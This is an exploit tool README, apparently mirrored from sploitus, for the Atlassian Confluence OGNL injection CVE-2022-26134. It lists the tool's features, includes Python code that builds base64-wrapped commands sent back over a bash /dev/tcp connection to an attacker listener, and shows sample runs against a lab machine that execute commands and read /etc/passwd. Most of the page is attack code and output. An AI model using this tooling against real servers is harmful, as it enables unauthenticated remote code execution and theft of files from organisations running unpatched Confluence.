## https://sploitus.com/exploit?id=597C8195-D623-5002-A378-66A54CD71A18
# CVE-2022-26134 - Atlassian Confluence OGNL RCE

This script wraps the unauthenticated OGNL injection in Confluence Data Center and Server ([CVE-2022-26134](https://nvd.nist.gov/vuln/detail/cve-2022-26134)) into a remote code execution tool: the injection is the primitive, the script handles command delivery and output retrieval.
- [Vendor advisory](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)

It was originally inspired by the PoC [`through_the_wire.py`](https://github.com/jbaines-r7/through_the_wire), with some "improvements" I've added:
- actual RCE: the command is base64-encoded and decoded on the target, so quotes and shell metacharacters survive the OGNL/URL encoding
- read commands from scripts with `-c @/path/to/file`; shebang-aware, so the interpreter named on the `#!` line runs the script (see [example usage](#example-usage))
- no `netcat` dependency; command and file-read output come back to a Python-native socket listener, which is why an LHOST is required
- preliminary vulnerability check before exploitation (`[*] target is vulnerable`, printed to stderr)
- Metasploit-style LHOST resolution: an interface name such as `tun0` is resolved to that interface's address
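
To make those bullets concrete, here is an added illustration of the attacker-side pieces (my own sketch for this page, not the wrapper's code and not `through_the_wire.py`): Metasploit-style interface resolution via the Linux `SIOCGIFADDR` ioctl, base64 wrapping of a `-c` argument with shebang detection, and a Python-native listener standing in for `nc -l`. The OGNL request itself is deliberately left out. The return path (bash `/dev/tcp` on the target), the exact shebang handling and the function names are assumptions, and the script text and output bytes are constructed inputs.

```python
#!/usr/bin/env python3
"""Attacker-side building blocks of the kind the feature list describes.
Added illustration only; the exploit request is not reproduced here."""
import base64
import fcntl
import socket
import struct
import sys
import tempfile
import threading

IS_LINUX = sys.platform.startswith("linux")
SIOCGIFADDR = 0x8915  # Linux ioctl request: fetch an interface's IPv4 address


def resolve_lhost(spec: str) -> str:
    """Metasploit-style LHOST: a literal IPv4 address or an interface name (tun0)."""
    try:
        socket.inet_aton(spec)
        return spec  # already an address literal
    except OSError:
        pass
    if not IS_LINUX:
        raise ValueError("interface name lookup is implemented for Linux only")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        # struct ifreq: 16-byte ifr_name followed by a sockaddr_in; the IPv4
        # address sits at byte offset 20 of the returned buffer
        ifreq = struct.pack("256s", spec[:15].encode())
        try:
            res = fcntl.ioctl(s.fileno(), SIOCGIFADDR, ifreq)
        except OSError as exc:
            raise ValueError(f"cannot resolve interface {spec!r}") from exc
    return socket.inet_ntoa(res[20:24])


def try_resolve_lhost(spec: str):
    """resolve_lhost, but None instead of an exception (for a CLI fallback)."""
    try:
        return resolve_lhost(spec)
    except ValueError:
        return None


def build_command(spec: str, lhost: str, lport: int) -> str:
    """Turn a `-c` argument into one line for the target's shell.

    '@path' reads a script; if its first line is a shebang, that interpreter
    runs it (assumed behaviour, modelled on "shebang-aware"). The body travels
    base64-encoded so quotes and metacharacters survive OGNL/URL encoding, and
    stdout+stderr go back over a bash /dev/tcp reverse connection (assumption:
    the target runs the line under bash).
    """
    interpreter = "sh"
    if spec.startswith("@"):
        with open(spec[1:], "rb") as fh:
            body = fh.read()
        first_line = body.split(b"\n", 1)[0]
        if first_line.startswith(b"#!"):
            interpreter = first_line[2:].decode().strip()
    else:
        body = spec.encode()
    b64 = base64.b64encode(body).decode()
    return f"echo {b64} | base64 -d | {interpreter} > /dev/tcp/{lhost}/{lport} 2>&1"


def decode_payload(cmd: str) -> str:
    """Recover the script/command text from a line built by build_command."""
    return base64.b64decode(cmd.split(" ", 2)[1]).decode()


def write_temp_script(text: str) -> str:
    """Write a constructed script to a temp file and return its path (demo helper)."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as fh:
        fh.write(text)
        return fh.name


def open_listener(lhost: str, lport: int) -> socket.socket:
    """Python-native stand-in for `nc -lvnp`: bound and listening, not yet accepting."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)
    return srv


def read_one_connection(srv: socket.socket, timeout: float = 10.0) -> bytes:
    """Accept a single connection, read until the peer closes, return the output."""
    srv.settimeout(timeout)
    with srv:
        conn, _peer = srv.accept()
    with conn:
        conn.settimeout(timeout)
        chunks = []
        while data := conn.recv(4096):
            chunks.append(data)
    return b"".join(chunks)


def simulate_roundtrip(output: bytes) -> bytes:
    """Offline demo: listener in a thread, a fake target connecting back on
    loopback and writing `output`. Returns what the listener collected."""
    srv = open_listener("127.0.0.1", 0)  # port 0: let the kernel pick a free port
    lport = srv.getsockname()[1]
    got = {}
    worker = threading.Thread(target=lambda: got.__setitem__("data", read_one_connection(srv)))
    worker.start()
    with socket.create_connection(("127.0.0.1", lport), timeout=5) as target:
        target.sendall(output)
    worker.join(10)
    return got.get("data", b"")


if __name__ == "__main__":
    path = write_temp_script("#!/usr/bin/env python3\nimport sys;print(sys.version)\n")
    print(build_command("@" + path, resolve_lhost("127.0.0.1"), 4444))
    print(simulate_roundtrip(b"uid=1001(confluence) gid=1001(confluence)\n").decode())
```

`resolve_lhost` accepts whatever `socket.inet_aton` accepts, so check that the result is a routable address for the target before launching; an interface that is down or has no IPv4 address (a tun0 that has not come up yet) raises `ValueError` rather than silently producing a bad LHOST.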

## example usage

Some examples from the Proving Grounds box [Flu](https://portal.offsec.com/machine/flu-150748/overview):
```sh-session
kali@kali:~/ctf/offsec/pg/flu$ cat test.py
#!/usr/bin/env python3
import sys;print(sys.version)

kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c '@test.py' http://192.168.159.41:8090 tun0 2>/dev/null
3.11.4 (main, Dec  7 2023, 15:43:41) [GCC 12.3.0]

kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py -c 'id;hostname;ip a' http://192.168.159.41:8090 tun0
[*] target is vulnerable
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
flu
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:86:cc:58 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.159.41/24 brd 192.168.159.255 scope global ens160
       valid_lft forever preferred_lft forever

kali@kali:~/ctf/offsec/pg/flu$ ./cve-2022-26134.py --readfile '/etc/passwd' http://192.168.159.41:8090 tun0 2>/dev/null | head
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
```